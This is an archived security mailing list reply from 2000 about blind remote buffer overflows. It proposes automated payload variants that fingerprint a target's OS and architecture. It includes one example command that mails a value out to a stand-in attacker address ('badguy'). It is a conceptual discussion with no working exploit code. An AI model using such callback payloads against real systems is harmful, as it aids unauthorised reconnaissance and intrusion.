Vulnerability Development mailing list archives
Re: Blind Remote Buffer Overflow
From: 11a () GMX NET (Bluefish)
Date: Tue, 2 May 2000 03:42:19 +0200
Uhm... To begin with, in most situations it seems unrecommended to assume the attacker is blind. But if he really is? Some people have mentioned some ways to try to find a vulnerability remotely. Now, let's say you have, by some means, determined that you can rewrite EIP, PC (or whatever it's called on your architecture). What to do now to detect the operating system and architecture?

I believe a 'generic buffer overflower' could be part of the answer. Let a tool be given what you know (or guess) about the overflow. Let it generate a number of variants (as an example: Linux/i386, Linux/sparc, Windows/i386), all of which do something like "echo 3 | mail badguy () test com". Depending upon what mail you actually get back, you know that the architecture is at least quite compatible with the environments that return an answer.

It does seem like quite some work, but it does (IMHO) show that even if a system has secret source code and secret binaries as well, it's not possible to provide security through obscurity. If such scans could be automated, it would raise a need even for programs which only exist on a single system to be coded quite well.

The group/company at www.eeye.com has a tool which can be used to scan for unknown exploits if you give it some information about "where you want to go today" (grin). I don't know how good it is, but perhaps support for 'blind overflows' to detect systems could be incorporated into their scanner.

-- 
http://www.11a.nu || http://bluefish.11a.nu
eleventh alliance development & security team